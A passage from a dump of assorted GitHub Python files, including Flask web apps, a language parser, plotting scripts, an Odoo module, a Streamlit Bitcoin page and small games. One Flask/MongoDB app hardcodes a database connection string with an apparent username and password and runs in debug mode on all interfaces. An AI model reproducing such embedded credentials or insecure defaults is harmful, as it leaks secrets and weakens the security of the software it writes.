utime.sleep_ms(100)\n\n","repo_name":"jdvpl/python-devnet-practicas","sub_path":"thonny/practicas/30pines/20fichero_dht11.py","file_name":"20fichero_dht11.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72533395684","text":"import sys\n\n\ndef read(filename):\n with open(filename, \"r\") as f:\n ls = f.readlines()\n f.close()\n return ls\n\ndef write(filename, data):\n with open(filename, \"w\") as f:\n for line in data:\n f.write(line)\n f.close()\n return\n\n\ndef lineParser(x):\n xs = x.split(' ', 1)\n start = xs[0]\n tname = xs[1]\n tlist = tname.split(' http://soundcloud.com/')\n name = tlist[0]\n start = start.replace(\"[\", \"\").replace(\"]\", \"\").replace(\":\",\" \")\n ys = start.split(\" \")\n for i in range(len(ys)):\n ys[i] = int(ys[i])\n if(len(ys) == 2):\n start = ys[1] + (ys[0] * 60)\n elif(len(ys) == 3):\n start = ys[2] + (ys[1] * 60) + (ys[0] * 3600)\n else:\n print(\"Error: Weird time format\")\n fs = [str(start), name]\n return fs\n\ndef fileParser(xs):\n fstr = \"\"\n tls = []\n fls = []\n for x in xs:\n x = lineParser(x)\n tls.append(x)\n for i in range(len(tls) - 1):\n fstr = tls[i][0] + \"\\t\" + tls[i+1][0] + \"\\t\" + tls[i][1] + \"\\n\"\n fls.append(fstr)\n return fls\n\n\ndef main():\n myfile = sys.argv[1]\n if(not myfile):\n print(\"Error: You must provide a file to parse.\")\n return\n data = read(myfile)\n fdata = fileParser(data)\n newfile = myfile + \"_adfm.txt\"\n write(newfile, fdata)\n return\n\nmain()\n","repo_name":"ATheringer/Parser","sub_path":"utube_parser.py","file_name":"utube_parser.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74804786405","text":"import os\nfrom app import flask_app\nfrom .config import config as cf\nfrom .auth import Authentication\nfrom flask_cors import cross_origin\nfrom .utils import responser, set_files\nfrom .data import data_groups, data_expenses\nfrom .enums import enums_headers, enums_folders\nfrom flask_login import login_required, login_user, logout_user\nfrom flask import (\n request,\n url_for,\n redirect,\n make_response,\n render_template,\n send_from_directory,\n)\n\noutput_folder = enums_folders.get_folder_prop(\"output\", \"value\")\nsecret_download_key = enums_headers.get_header_prop(\"download_secret\", \"key\")\nsecret_download_value = enums_headers.get_header_prop(\"download_secret\", \"value\")\n\n\n@flask_app.route(\"/\")\n@cross_origin()\ndef index():\n return render_template(\"index.html\", environment=cf.environment)\n\n\n@flask_app.route(\"/login\", methods=[\"POST\"])\n@cross_origin()\ndef login():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n if Authentication.check(username, password):\n user = Authentication(username)\n login_user(user)\n return redirect(url_for(\"index\"))\n\n\n@flask_app.route(\"/logout\", methods=[\"POST\"])\n@cross_origin()\n@login_required\ndef logout():\n logout_user()\n response = make_response(\"\", 204)\n response.headers[\"Refresh\"] = \"0; url=/\"\n return response\n\n\n@flask_app.route(\"/sw.js\")\n@cross_origin()\n@login_required\ndef sw():\n return flask_app.send_static_file(\"sw.js\")\n\n\n@flask_app.route(\"/groups\", methods=[\"GET\"])\n@cross_origin()\n@login_required\ndef groups():\n return data_groups()\n\n\n@flask_app.route(\"/expenses\", methods=[\"POST\"])\n@cross_origin()\n@login_required\ndef expenses():\n parameter = request.get_json()\n csv = parameter.get(\"csv\", False)\n year = parameter.get(\"year\", None)\n month = parameter.get(\"month\", None)\n group = parameter.get(\"group\", None)\n chart = parameter.get(\"chart\", False)\n category = parameter.get(\"category\", None)\n personal = parameter.get(\"personal\", False)\n return data_expenses(\n csv=csv,\n year=year,\n chart=chart,\n group=group,\n month=month,\n category=category,\n personal=personal,\n )\n\n\n@flask_app.route(\"/download\")\n@cross_origin()\n@login_required\ndef download():\n path = os.path.join(os.getcwd(), output_folder)\n os.makedirs(path, exist_ok=True)\n files = [f for f in set_files(os.listdir(output_folder)) if f[\"extension\"] == \"csv\"]\n response = render_template(\"templates/download.html\", files=files)\n return responser(\n request=request,\n response=response,\n header=secret_download_key,\n secret=secret_download_value,\n )\n\n\n@flask_app.route(\"/download/\")\n@cross_origin()\n@login_required\ndef download_file(filename):\n return send_from_directory(f\"../{output_folder}\", filename)\n","repo_name":"falcosan/Splitwired","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9614265729","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nn=int(input())\nw={}\nd=[]\nfor i in range(n):\n x,y=map(int, input().split())\n d.append((x,y))\n\nchk=0\nfor i in range(n):\n a=d[i][0]\n b=d[i][1]\n for j in range(n):\n if i==j: continue\n p=d[j][0]\n q=d[j][1]\n if (a-p,b-q) in w:\n w[(a-p,b-q)]+=1\n else:\n w[(a-p,b-q)]=1\n chk=max(chk,w[(a-p,b-q)])\nprint(n-chk)\n","repo_name":"clarinet758/atcoder","sub_path":"etc/kigyo/diverta/2019-2/b1.py","file_name":"b1.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20602458337","text":"from flask import Flask, jsonify, request, render_template\nfrom pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport requests\n\nclient = MongoClient('mongodb+srv://riVFerd:test_mongodb@cluster0.rq9u845.mongodb.net/?retryWrites=true&w=majority')\ndb = client.dbsparta\n\ndef get_meta(url):\n headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 OPR/93.0.0.0'}\n\n data = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(data.text, 'html.parser')\n\n image = soup.select_one('meta[property=\"og:image\"]')['content']\n title = soup.select_one('meta[property=\"og:title\"]')['content']\n desc = soup.select_one('meta[property=\"og:description\"]')['content']\n \n return {\n 'image': image,\n 'title': title,\n 'desc': desc\n }\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/movie', methods=['POST'])\ndef movie_post():\n star = request.form['star_give']\n comment = request.form['comment_give']\n meta = get_meta(request.form['url_give'])\n \n image = meta['image']\n title = meta['title']\n desc = meta['desc']\n \n db.movies.insert_one({\n 'image': image,\n 'title': title,\n 'desc': desc,\n 'star': star,\n 'comment': comment\n })\n \n return jsonify({\n 'msg': 'POST request!'\n })\n\n@app.route('/movie', methods=['GET'])\ndef movie_get():\n movie_list = list(db.movies.find({}, {'_id': False}))\n return jsonify({\n 'movies': movie_list,\n 'msg': 'GET request!'\n })\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5555, debug=True)","repo_name":"zhrnnsw/spartapedia","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6924505048","text":"from typing import Union, List, Optional\n\ntry:\n from .iparser import *\n from .document import *\n from .itokenizer import *\nexcept ImportError:\n from qasm.parsing.iparser import *\n from qasm.parsing.document import *\n from qasm.parsing.itokenizer import *\n\n\nclass Parser(IParser):\n @staticmethod\n def _get_token(tokenizer: ITokenizer, value: Union[str, TokenType]) -> Token:\n token = tokenizer.token\n tokenizer.eat(value)\n return token\n\n def _try_get_token(self, tokenizer: ITokenizer, value: Union[str, TokenType]) -> Optional[Token]:\n if tokenizer.token == value:\n return self._get_token(tokenizer, value)\n return None\n\n def _try_get_type(self, tokenizer: ITokenizer) -> Optional[Type]:\n if tokenizer.token == TokenType.Identifier:\n return self._get_type(tokenizer)\n return None\n\n def _get_type(self, tokenizer: ITokenizer) -> Type:\n type_name = self._get_token(tokenizer, TokenType.Identifier)\n typ = Type(type_name)\n while tokenizer.token == TokenType.Asterisk:\n typ = Pointer(typ, self._get_token(tokenizer, TokenType.Asterisk))\n return typ\n\n def _get_parameter(self, tokenizer: ITokenizer) -> Parameter:\n typ = self._get_type(tokenizer)\n name = self._try_get_token(tokenizer, TokenType.Identifier)\n return Parameter(name, typ)\n\n def _get_parameters(self, tokenizer: ITokenizer) -> List[Parameter]:\n try:\n params = [self._get_parameter(tokenizer)]\n except UnexpectedTokenError:\n return []\n while self._try_get_token(tokenizer, TokenType.Comma):\n params.append(self._get_parameter(tokenizer))\n return params\n\n def _get_modifiers(self, tokenizer: ITokenizer) -> List[Token]:\n modifiers = []\n while True:\n modifier = self._try_get_token(tokenizer, TokenType.Identifier)\n if not modifier:\n break\n modifiers.append(modifier)\n return modifiers\n\n def _get_import_declaration(self, tokenizer: ITokenizer) -> ImportDeclaration:\n import_type = self._get_token(tokenizer, TokenType.Identifier)\n name = self._get_fully_qualified_name(tokenizer)\n return ImportDeclaration(import_type, name, {\n VariableDeclaration.declaration_keyword: ImportType.Variable,\n FunctionDeclaration.declaration_keyword: ImportType.Function,\n TypeDeclaration.declaration_keyword: ImportType.Type\n }[import_type.value])\n\n def _get_import_statement(self, tokenizer: ITokenizer) -> ImportStatement:\n keyword = self._get_token(tokenizer, ImportStatement.declaration_keyword)\n modifiers = self._get_modifiers(tokenizer)\n source = self._get_token(tokenizer, TokenType.Literal_String)\n import_statement = ImportStatement(keyword, source, modifiers)\n if not self._try_get_token(tokenizer, TokenType.SemiColon):\n tokenizer.eat(TokenType.LeftCurlyBracket)\n while not self._try_get_token(tokenizer, TokenType.RightCurlyBracket):\n import_statement.add_import(self._get_import_declaration(tokenizer))\n return import_statement\n\n def _get_instruction(self, tokenizer: ITokenizer) -> Instruction:\n name = self._get_fully_qualified_name(tokenizer)\n arguments = self._get_instruction_arguments(tokenizer)\n return Instruction(name, arguments)\n\n def _get_instruction_argument(self, tokenizer: ITokenizer) -> InstructionArgument:\n value = self._get_fully_qualified_name(tokenizer) if tokenizer.token == TokenType.Identifier else self._get_literal(tokenizer)\n if self._try_get_token(tokenizer, TokenType.Colon):\n typ = self._get_type(tokenizer)\n else:\n typ = None\n return InstructionArgument(value, typ)\n\n def _get_instruction_arguments(self, tokenizer: ITokenizer) -> List[InstructionArgument]:\n try:\n arguments = [self._get_instruction_argument(tokenizer)]\n except UnexpectedTokenError:\n return []\n while self._try_get_token(tokenizer, TokenType.Comma):\n arguments.append(self._get_instruction_argument(tokenizer))\n return arguments\n\n def _get_function_signature(self, tokenizer: ITokenizer) -> FunctionDeclaration:\n keyword = self._get_token(tokenizer, FunctionDeclaration.declaration_keyword)\n name = self._get_fully_qualified_name(tokenizer)\n self._get_token(tokenizer, TokenType.LeftCurvyBracket)\n params = self._get_parameters(tokenizer)\n tokenizer.eat(TokenType.RightCurvyBracket)\n tokenizer.eat(TokenType.Colon)\n return_type = self._get_type(tokenizer)\n return FunctionDeclaration(keyword, name, params, return_type)\n\n def _get_function_definition(self, tokenizer: ITokenizer) -> FunctionDefinition:\n declaration = self._get_function_signature(tokenizer)\n if self[ParserOptions.AllowFunctionModifiers]:\n modifiers = self._get_modifiers(tokenizer)\n else:\n modifiers = []\n func = FunctionDefinition(declaration.keyword, declaration.name, declaration.parameters, declaration.return_type_name, modifiers)\n tokenizer.eat(TokenType.LeftCurlyBracket)\n while not self._try_get_token(tokenizer, TokenType.RightCurlyBracket):\n if tokenizer.token == VariableDeclaration.declaration_keyword:\n func.add_local(self._get_variable_declaration(tokenizer))\n else:\n func.add_instruction(self._get_instruction(tokenizer))\n return func\n\n def _get_fully_qualified_name(self, tokenizer: ITokenizer) -> FullyQualifiedName:\n parts = [self._get_token(tokenizer, TokenType.Identifier)]\n while self._try_get_token(tokenizer, TokenType.Dot):\n parts.append(self._get_token(tokenizer, TokenType.Identifier))\n return FullyQualifiedName(*parts)\n\n def _get_literal(self, tokenizer: ITokenizer) -> Token:\n if not tokenizer.token.type.is_literal():\n raise UnexpectedTokenError(TokenType.Literal, tokenizer.token)\n return self._get_token(tokenizer, tokenizer.token.type)\n\n def _get_variable_declaration(self, tokenizer: ITokenizer) -> VariableDeclaration:\n keyword = self._get_token(tokenizer, VariableDeclaration.declaration_keyword)\n name = self._get_fully_qualified_name(tokenizer)\n tokenizer.eat(TokenType.Colon)\n typ = self._get_type(tokenizer)\n if self._try_get_token(tokenizer, TokenType.SemiColon):\n return VariableDeclaration(keyword, name, typ)\n if self[ParserOptions.AllowVariableModifiers]:\n modifiers = self._get_modifiers(tokenizer)\n else:\n modifiers = []\n tokenizer.eat(TokenType.Equal)\n value = self._get_literal(tokenizer)\n tokenizer.eat(TokenType.SemiColon)\n return VariableDefinition(keyword, name, typ, modifiers, value)\n\n def _get_type_definition(self, tokenizer: ITokenizer) -> TypeDefinition:\n keyword = self._get_token(tokenizer, TypeDefinition.declaration_keyword)\n name = self._get_fully_qualified_name(tokenizer)\n modifiers = self._get_modifiers(tokenizer)\n typ = TypeDefinition(keyword, name, modifiers)\n tokenizer.eat(TokenType.LeftCurlyBracket)\n while not self._try_get_token(tokenizer, TokenType.RightCurlyBracket):\n if tokenizer.token == VariableDeclaration.declaration_keyword:\n typ.add_field(self._get_variable_declaration(tokenizer))\n elif tokenizer.token == FunctionDefinition.declaration_keyword:\n typ.add_function(self._get_function_definition(tokenizer))\n else:\n raise UnexpectedTokenError(\" or \".join(\n [\n VariableDeclaration.declaration_keyword,\n FunctionDefinition.declaration_keyword\n ]\n ), tokenizer.token)\n return typ\n\n def parse(self, tokenizer: ITokenizer) -> Document:\n document = Document()\n tokenizer[TokenizerOptions.EmitComments] = False\n tokenizer.advance()\n with self.options(ParserOptions.AllowFunctionModifiers, ParserOptions.AllowVariableModifiers).enabled():\n while tokenizer.has_tokens:\n token = tokenizer.token\n if token == FunctionDefinition.declaration_keyword:\n document.add_function(self._get_function_definition(tokenizer))\n elif token == VariableDefinition.declaration_keyword:\n document.add_global(self._get_variable_declaration(tokenizer))\n elif token == TypeDefinition.declaration_keyword:\n document.add_type(self._get_type_definition(tokenizer))\n elif token == ImportStatement.declaration_keyword:\n document.add_import(self._get_import_statement(tokenizer))\n else:\n raise UnexpectedTokenError(\" or \".join(\n [\n VariableDefinition.declaration_keyword,\n FunctionDefinition.declaration_keyword,\n TypeDefinition.declaration_keyword,\n ImportStatement.declaration_keyword\n ]\n ), token)\n\n return document\n\n\nif __name__ == '__main__':\n from qasm.parsing.tokenizer import Tokenizer\n with open(\"../../tests/hello_world.qsm\") as src:\n tokenizer = Tokenizer(src.read())\n parser = Parser()\n document = parser.parse(tokenizer)\n\n WIDTH = 50\n CHAR = '-'\n\n print(\" IMPORTS \".center(WIDTH, CHAR))\n print()\n\n for imp in document.imports:\n print(f\"import [{' '.join(map(lambda x: x.value, imp.modifiers))}] {imp.file.value} at line {imp.keyword.line} {{\")\n for item in imp.imports:\n print(f\"\\t{item.import_type.name} {item.name.name.value}\")\n print(\"}\")\n print()\n print()\n\n print(\" TYPES \".center(WIDTH, CHAR))\n print()\n\n for typ in document.types:\n print(f\"type {typ.name}{' ' + ' '.join(map(str, typ.modifiers))} declared at line {typ.keyword.line} {{\")\n for field in typ.fields:\n print(f\"\\tfield {field.name}: {field.type}\")\n print()\n for func in typ.functions:\n print(f\"\\tmethod {func.name}({', '.join(map(lambda p: f'{p.name}: {p.type}', func.parameters))}) [{' '.join(map(lambda x: x.value, func.modifiers))}] declared at line {func.keyword.line} {{\")\n for instruction in func.body:\n print(f\"\\t\\t{instruction.name}\", \", \".join(map(lambda x: f\"{x.value}{f': {x.type}' if x.type else ''}\", instruction.arguments)))\n print(\"\\t}\")\n print(\"}\")\n print()\n print()\n\n print(\" GLOBALS \".center(WIDTH, CHAR))\n print()\n\n for var in document.globals:\n print(f\"global {var.name}: {var.type}{f' = {var.value.value}' if isinstance(var, VariableDefinition) else ''}\")\n print()\n print()\n\n print(\" FUNCTIONS \".center(WIDTH, CHAR))\n print()\n for func in document.functions:\n print(f\"function {func.name}({', '.join(map(lambda p: f'{p.name.value}: {p.type}', func.parameters))}) [{' '.join(map(lambda x: x.value, func.modifiers))}] declared at line {func.keyword.line} {{\")\n for instruction in func.body:\n print(f\"\\t{instruction.name}\", \", \".join(map(lambda x: f\"{x.value}{f': {x.type}' if x.type else ''}\", instruction.arguments)))\n print('}')\n print()\n","repo_name":"xpodev/qasm-py","sub_path":"qasm/parsing/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":11824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12131053848","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef drawHW1(result):\n result = np.array(result)\n year = result[:,0]\n total = result[:,1]\n man = result[:,2]\n woman = result[:,3]\n city = result[:,4]\n cotrysd = result[:,5]\n\n fig = plt.figure(figsize = (15,5))\n # plt.bar(year,total,tick_label = year.astype('int').tolist(),width = 0.6)\n plt.bar(year,man,tick_label = year.astype('int').tolist(),width = 0.6,label = 'man')\n plt.bar(year,woman,tick_label = year.astype('int').tolist(),width = 0.6,bottom=man,label = 'woman')\n plt.xlabel('Year')\n plt.ylabel('Population/*10^4')\n plt.title('Total')\n plt.legend(loc='lower left')\n plt.grid()\n plt.savefig('HW1_1.png')\n plt.show()\n\n fig = plt.figure(figsize = (15,5))\n # plt.bar(year,total,tick_label = year.astype('int').tolist(),width = 0.6)\n plt.bar(year,city,tick_label = year.astype('int').tolist(),width = 0.6,label = 'city')\n plt.bar(year,cotrysd,tick_label = year.astype('int').tolist(),width = 0.6,bottom=city,label = 'countryside')\n plt.xlabel('Year')\n plt.ylabel('Population/*10^4')\n plt.title('Total')\n plt.legend(loc='lower left')\n plt.grid()\n plt.savefig('HW1_2.png')\n plt.show()\n\n\n man_ratio = man/total\n city_ratio = city/total\n\n fig = plt.figure(figsize = (15,5))\n plt.plot(year,man_ratio,'^-',label = 'man')\n plt.plot(year,1-man_ratio,'o-',label = 'woman')\n plt.xticks(year.astype('int').tolist())\n plt.xlabel('Year')\n plt.ylabel('Population proportion')\n plt.title('Man vs Woman')\n plt.legend()\n plt.grid()\n plt.savefig('HW1_3.png')\n plt.show()\n\n\n fig = plt.figure(figsize = (15,5))\n plt.plot(year,city_ratio,'^-',label = 'city')\n plt.plot(year,1-city_ratio,'o-',label = 'countryside')\n plt.xticks(year.astype('int').tolist())\n plt.xlabel('Year')\n plt.ylabel('Population proportion')\n plt.title('City vs Countryside')\n plt.legend()\n plt.grid()\n plt.savefig('HW1_4.png')\n plt.show()\n\n\ndef drawHW2(d,result):\n result = np.array(result)\n # print(result)\n for i in range(len(d)):\n cmd = 'result[:,{}]'.format(str(i))\n locals()[d[i]] = eval(cmd)\n # print(cmd)\n # print(locals()['year'])\n # print(locals())\n\n fig = plt.figure(figsize = (15,5))\n plt.plot(locals()['year'],locals()['born'],'^-',label = 'Born')\n plt.plot(locals()['year'],locals()['die'],'o-',label = 'Die')\n plt.plot(locals()['year'],locals()['increase'],'*-',label = 'Increase')\n plt.xticks(locals()['year'].astype('int').tolist())\n plt.xlabel('Year')\n plt.ylabel('Ratio/0.001')\n plt.title('Population change ratio')\n plt.legend()\n plt.grid()\n plt.savefig('HW2_ratio.png')\n plt.show()\n\n c1998 = 100\n popu = (1+locals()['increase']/1000)\n inc = np.multiply.accumulate(popu[::-1])[::-1]\n popu = c1998*inc\n fig = plt.figure(figsize = (15,5))\n # plt.bar(year,total,tick_label = year.astype('int').tolist(),width = 0.6)\n plt.bar(locals()['year'],popu,tick_label = locals()['year'].astype('int').tolist(),width = 0.6,label = 'population')\n plt.xlabel('Year')\n plt.ylabel('Population')\n plt.title('Population (assume 1998 is 100)')\n plt.legend(loc='lower left')\n plt.grid()\n plt.savefig('HW2_popu.png')\n plt.show()\n\n\n","repo_name":"KiritoHugh/Nation_statistic_crawler","sub_path":"create_fig.py","file_name":"create_fig.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11312029546","text":"\"\"\"\n Unit tests for functions/classes in nn_constraint_checker.py\n -- kandasamy@cs.cmu.edu\n\"\"\"\n\n# pylint: disable=no-member\n# pylint: disable=invalid-name\n# pylint: disable=relative-import\n\n# Local imports\nfrom . import nn_domains\nfrom .unittest_neural_network import generate_cnn_architectures, \\\n generate_mlp_architectures\nfrom ..utils.base_test_class import BaseTestClass, execute_tests\n\n\nclass NNConstraintCheckerTestCase(BaseTestClass):\n \"\"\" Contains unit tests for the TransportNNDistanceComputer class. \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\" Constructor. \"\"\"\n super(NNConstraintCheckerTestCase, self).__init__(*args, **kwargs)\n self.nns = generate_cnn_architectures() + generate_mlp_architectures()\n self.cnn_constraint_checker = nn_domains.CNNConstraintChecker(\n 25, 5, 500000, 0, 5, 2, 15, 512, 16, 4)\n self.mlp_constraint_checker = nn_domains.MLPConstraintChecker(\n 25, 5, 500000, 900, 5, 2, 15, 30, 8)\n\n def test_constraint_checker(self):\n \"\"\" Tests if the constraints are satisfied for each network. \"\"\"\n report_str = ('Testing constraint checker: max_layers=%d, max_mass=%d,' +\n 'max_out_deg=%d, max_in_deg=%d, max_edges=%d, max_2stride=%d.')%(\n self.cnn_constraint_checker.max_num_layers,\n self.cnn_constraint_checker.max_mass,\n self.cnn_constraint_checker.max_in_degree,\n self.cnn_constraint_checker.max_out_degree,\n self.cnn_constraint_checker.max_num_edges,\n self.cnn_constraint_checker.max_num_2strides,\n )\n self.report(report_str)\n for nn in self.nns:\n if nn.nn_class == 'cnn':\n violation = self.cnn_constraint_checker(nn, True)\n constrain_satisfied = self.cnn_constraint_checker(nn)\n img_inv_sizes = [piis for piis in nn.post_img_inv_sizes if piis != 'x']\n nn_class_str = ', max_inv_size=%d '%(max(img_inv_sizes))\n else:\n violation = self.mlp_constraint_checker(nn, True)\n constrain_satisfied = self.mlp_constraint_checker(nn)\n nn_class_str = ' '\n self.report(('%s: #layers:%d, mass:%d, max_outdeg:%d, max_indeg:%d, ' +\n '#edges:%d%s:: %s, %s')%(\n nn.nn_class, len(nn.layer_labels), nn.get_total_mass(),\n nn.get_out_degrees().max(), nn.get_in_degrees().max(),\n nn.conn_mat.sum(), nn_class_str, str(constrain_satisfied), violation),\n 'test_result')\n assert (constrain_satisfied and violation == '') or \\\n (not constrain_satisfied and violation != '')\n\n\nif __name__ == '__main__':\n execute_tests()\n\n","repo_name":"dragonfly/dragonfly","sub_path":"dragonfly/nn/unittest_nn_domains.py","file_name":"unittest_nn_domains.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":811,"dataset":"github-code","pt":"52"} +{"seq_id":"31155777659","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\n\nclass AccountConfigSettings(models.TransientModel):\n _inherit = 'account.config.settings'\n\n group_receipt_supplier_matrix = fields.Boolean(\"Use for receipt/supplier approving matrix menu\", implied_group='sg_partner_payment.group_receipt_supplier_matrix',\n help=\"\"\"Allows to show Receipt/Supplier Approving Matrix menu. \"\"\")\n group_supplier_matrix = fields.Boolean(\"Use for supplier approving matrix menu\",\n implied_group='sg_partner_payment.group_supplier_matrix',\n help=\"\"\"Allows to show Supplier Approving Matrix menu. \"\"\")\n\n @api.onchange('is_customer_receipt_approving_matrix', 'is_supplier_payment_approving_matrix')\n def onchange_receipt_supplier_matrix(self):\n if self.is_customer_receipt_approving_matrix:\n self.group_receipt_supplier_matrix = True\n else:\n self.group_receipt_supplier_matrix = False\n\n if self.is_supplier_payment_approving_matrix:\n self.group_supplier_matrix = True\n else:\n self.group_supplier_matrix = False\n\nAccountConfigSettings()","repo_name":"Muhammad-SF/Test","sub_path":"core/sg_partner_payment/models/res_config.py","file_name":"res_config.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29927324687","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport settingsBar\nimport comparisonTable\n\nst.set_page_config(page_title=\"The Playground - The Past, The Present & The Future of Bitcoin.\", page_icon=\"🚸\",layout=\"wide\")\n# st.write(st.session_state[\"shared\"])\n\n# ! SETTINGS SIDEBAR #########################################################\nwith st.sidebar.expander(\"#### TPS Settings\"):\n settingsBar.slider_tps_label()\n slider_BTC_TPS, max_daily_transactions_BTC = settingsBar.slider_tps_btc()\n slider_BCH_TPS, max_daily_transactions_BCH = settingsBar.slider_tps_bch()\n\nwith st.sidebar.expander(\"#### Hashrate Settings\"):\n settingsBar.slider_hashrate_label()\n slider_exaHashes_BTC = settingsBar.slider_hashrate_btc()\n slider_exaHashes_BCH = settingsBar.slider_hashrate_bch()\n\nwith st.sidebar.expander(\"#### Energy Usage Settings\"):\n settingsBar.slider_energyUsageYearlyTwH_label()\n energyUsageYearlyKwH_BTC, slider_energyUsageYearlyTwH_BTC = settingsBar.slider_energyUsageYearlyTwH_btc()\n energyUsageYearlyKwH_BCH, energyUsageYearlyTwH_BCH = settingsBar.slider_energyUsageYearlyTwH_bch(slider_energyUsageYearlyTwH_BTC,slider_exaHashes_BTC,slider_exaHashes_BCH)\n\nwith st.sidebar.expander(\"#### Price Settings\"):\n settingsBar.slider_price_label()\n slider_PriceBTC = settingsBar.slider_price_btc(69.0, 69696969.0, 420.0, 10.0)\n slider_PriceBCH = settingsBar.slider_price_bch()\n\n\nwith st.sidebar.expander(\"#### Block Reward Settings\"):\n settingsBar.select_blockreward_label()\n blockReward, totalDailyBlockRewards = settingsBar.select_blockreward(index=4)\n\nwith st.sidebar.expander(\"#### Chart Settings\"):\n settingsBar.chart_settings_label()\n start_value, end_value, step = settingsBar.input_chart_settings_electricity()\n\n# ! SETTINGS SIDEBAR #########################################################\n\n\ncomparisonTable.fullTable(slider_BTC_TPS,\n max_daily_transactions_BTC,\n slider_BCH_TPS,\n max_daily_transactions_BCH,\n slider_exaHashes_BTC,\n slider_exaHashes_BCH,\n energyUsageYearlyKwH_BTC,\n slider_energyUsageYearlyTwH_BTC,\n energyUsageYearlyKwH_BCH,\n energyUsageYearlyTwH_BCH,\n slider_PriceBTC,\n slider_PriceBCH,\n blockReward,\n totalDailyBlockRewards)\n","repo_name":"abclution/PastPresentFuture","sub_path":"pages/7_🚸_Playground.py","file_name":"7_🚸_Playground.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11506234190","text":"\"\"\"\n Given a binary array, find the maximum number of consecutive 1s in this array if you can flip at most one 0.\n\n Example 1:\n\n Input: [1,0,1,1,0]\n Output: 4\n Explanation: Flip the first zero will get the the maximum number of consecutive 1s.\n After flipping, the maximum number of consecutive 1s is 4.\n Note:\n\n The input array will only contain 0 and 1.\n The length of input array is a positive integer and will not exceed 10,000\n Follow up:\n What if the input numbers come in one by one as an infinite stream? In other words, you can't store all numbers coming from the stream as it's too large to hold in memory. Could you solve it efficiently?\n\"\"\"\nclass Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n if not nums: return 0\n \"\"\"\n maxlen, res = 0, 0\n j = 0\n cnt = collections.defaultdict(int)\n for i in range(len(nums)):\n cnt[nums[i]] += 1\n if nums[i] == 1 and cnt[nums[i]] > maxlen:\n maxlen = cnt[nums[i]]\n \n while i - j - maxlen + 1 > 1:\n cnt[nums[j]] -= 1\n j += 1\n res = max(res, i - j + 1)\n return res\n \"\"\"\n\n pre, curr, maxlen = -1, 0, 0\n for n in nums:\n if n == 0:\n pre, curr = curr, 0\n else:\n curr += 1\n maxlen = max(maxlen, pre + 1 + curr )\n \n return maxlen\n","repo_name":"NiuNiu-jupiter/Leetcode","sub_path":"Premuim/487. Max Consecutive Ones II.py","file_name":"487. Max Consecutive Ones II.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41792204433","text":"#Blackjack game\nfrom random import randint\n\ndealer = randint(0,11)\ncard1 = randint(0,11)\ncard2 = randint(0,11)\nothers = [\"queen\",\"king\",\"ace\",\"joker\"]\n\ndef Game(card1, card2):\n print(\"Welcome to this game of Blackjack, your objective is to get 21 or get the closest number to 21 without going over but getting something higher than the dealer good luck with the game you'll need it\")\n total = card1 + card2\n while total < 21 :\n print(\" \")\n print(\"dealers hand:\",dealer)\n hand = (\"your hand, card 1: \", card1, \"card 2: \", card2 )\n total = card1+card2\n print(hand)\n print(\"total:\", total)\n next = (input(\"Hit or stand?\"))\n if next==\"stand\":\n print(\"stand\")\n break\n elif next==\"hit\":\n print(\"dealers hand:\", dealer + dealer)\n print(\"Your hand:\",total + card1)\n if total > 21:\n print(\"You lose\")\n \n \n \n\n \n \n\n\nGame(card1, card2)","repo_name":"dserranog0216/perf-task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23790533356","text":"\nimport re\nimport jieba\nimport os\n\njieba.load_userdict('userfiles/dict_catalog.txt')\njieba.load_userdict('userfiles/dict_entity1.txt')\njieba.load_userdict('userfiles/dict_pinpai.txt')\n\n\nclass DataProcessing:\n def __init__(self, cut_level='char'):\n self.cut_level = cut_level\n\n def clean_sent(self, sent):\n sent = re.sub('\\t', '', sent)\n return sent\n\n def cut_sent(self, sent):\n if self.cut_level == 'word':\n sent = ' '.join(jieba.cut(sent.strip()))\n elif self.cut_level == 'char':\n this_list = []\n for word in sent.strip():\n this_list.append(word)\n sent = ' '.join(this_list)\n else:\n print(\"wrong parameter: 